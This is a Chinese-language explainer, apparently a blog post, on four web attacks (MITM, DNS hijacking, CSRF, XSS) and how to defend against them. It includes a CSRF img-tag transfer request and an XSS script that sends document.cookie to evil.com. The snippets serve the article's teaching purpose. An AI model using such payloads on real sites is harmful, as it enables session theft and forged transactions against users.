你写的网站安全吗?这四个攻击方式正在悄悄盯上你

853 阅读5分钟

面试导航 是一个专注于前、后端技术学习和面试准备的 免费 学习平台,提供系统化的技术栈学习,深入讲解每个知识点的核心原理,帮助开发者构建全面的技术体系。平台还收录了大量真实的校招与社招面经,帮助你快速掌握面试技巧,提升求职竞争力。如果你想加入我们的交流群,欢迎通过微信联系:yunmz777

🔐 Web 安全必知四大攻击:MITM、DNS 劫持、CSRF 和 XSS 通俗详解

在互联网开发中,无论你是前端、后端还是运维工程师,Web 安全都是绕不开的话题。今天我们来通俗地了解四种最常见、最致命的网络攻击方式:中间人攻击(MITM)、DNS 劫持、跨站请求伪造(CSRF)、跨站脚本攻击(XSS)。

🕵️‍♂️ 1. 中间人攻击(MITM:Man-In-The-Middle)

📌 什么是中间人攻击?

简单来说,中间人攻击就是有人“偷偷坐在你和服务器之间”,偷听你们的对话,甚至冒充你们俩互相交流。你以为你在和银行网站交流,其实你把账号密码都告诉了攻击者。

🎯 举个例子:

你在机场连上了免费 Wi-Fi,输入了 https://bank.com 登录界面,但这个 Wi-Fi 被黑客控制了。他在你和银行之间建立了“假连接”,把你输的账号密码全部截获下来,甚至还能伪造银行的回复。

🔍 攻击过程简化为三步:

  1. 你访问一个网站,攻击者截获了请求
  2. 他把请求转发给真正的服务器
  3. 再把服务器的响应转回来,中间数据全被他看到或修改

🛡️ 如何防范?

方法解释
使用 HTTPS所有通信加密,别人看不到内容
浏览器 HSTS强制网站始终用 HTTPS
谨慎使用公共 Wi-Fi尤其不要在其中登录重要账号
检查证书如果浏览器提示“连接不安全”,千万别继续访问

🌐 2. DNS 劫持(DNS Hijacking)

📌 什么是 DNS?

DNS(Domain Name System)就像互联网的电话簿:你输入 google.com,它会告诉你这个域名对应哪个 IP 地址,浏览器再根据 IP 去找服务器。

😈 那什么是 DNS 劫持?

攻击者篡改了这份“电话簿”,让你以为你访问的是官网,其实你访问的是钓鱼网站。页面长得一模一样,但你一输入密码就完了。

🎯 举个例子:

你打开 taobao.com,DNS 本该告诉你“去 123.123.123.123(淘宝服务器)”,但被劫持后告诉你“去 111.111.111.111(攻击者服务器)”,你打开的是假淘宝,输入的信息全被窃取。

📌 常见的劫持方式:

  • 修改本地 hosts 文件
  • 家庭路由器被篡改 DNS 设置
  • 攻击公共 DNS 缓存服务器

🛡️ 如何防范?

方法描述
使用可信 DNS如 Google(8.8.8.8)或 Cloudflare(1.1.1.1)
启用 DoH / DoTDNS over HTTPS/TLS,DNS 查询也加密
使用 HTTPS即使 DNS 被劫持,也难篡改实际数据
路由器设置密码防止他人远程更改设置

🎯 3. CSRF(跨站请求伪造)

📌 它是什么?

CSRF 是攻击者借你的“身份”发请求。你自己没做什么,但服务器以为你发了请求,结果就中了招。

🎯 举个简单例子:

你登录了银行网站(银行已经给你发了登录 cookie),然后你去看一个“神秘网站”的视频。这个网站偷偷发了一个请求:

<img src="https://bank.com/transfer?to=attacker&amount=1000" />

你根本不知道有这个请求,但浏览器会自动带上你的 cookie,银行以为你主动转账。

🧨 为什么危险?

  • 所有自动带 cookie 的请求都可能成为攻击工具
  • 不需要你手动操作,只要你打开恶意网站就中招

🛡️ 如何防范?

方法说明
CSRF Token每次请求时加一个后端生成的 token,攻击者拿不到
SameSite Cookie限制 cookie 的跨站使用
验证来源后端校验请求的 Referer 或 Origin
重要操作用 POST避免 GET 修改重要数据

💥 4. XSS(跨站脚本攻击)

📌 它是什么?

XSS 是攻击者往网页里插入 JavaScript 脚本,比如你看一条评论,它偷偷执行了一段 JS,然后把你 cookie 传给黑客。

🎯 例子场景:

你在论坛里看到一条评论:“欢迎访问我的网站”,点击进去网页瞬间弹窗。这其实是:

<script>
  fetch("http://evil.com?cookie=" + document.cookie);
</script>

攻击者就能窃取你的登录状态、token 等。

📌 XSS 三种类型:

类型特点举例
存储型服务端存储,反复攻击评论系统
反射型URL 中传参搜索页、错误页
DOM 型前端拼接 HTML 出现漏洞innerHTMLdocument.write()

🛡️ 如何防范?

方法说明
所有用户输入都要过滤不允许 <script>onerror 等危险字符
输出前转义用 HTML 转义将代码当文本输出
设置 CSP 策略限制 JS 加载来源
前端开发规范避免使用 dangerouslySetInnerHTMLv-html 等危险 API

🧠 总结一张图,记住它们的区别

类型攻击方式危害防御策略
MITM拦截通信数据泄露HTTPS + HSTS
DNS 劫持篡改 DNS 指向访问钓鱼站安全 DNS + DoH
CSRF冒充用户发请求账户被操作Token + SameSite
XSS插入 JS 脚本窃取信息输入过滤 + CSP

📢 最后一句话总结:

XSS 窃数据、CSRF 窃身份、MITM 监听内容、DNS 劫持方向。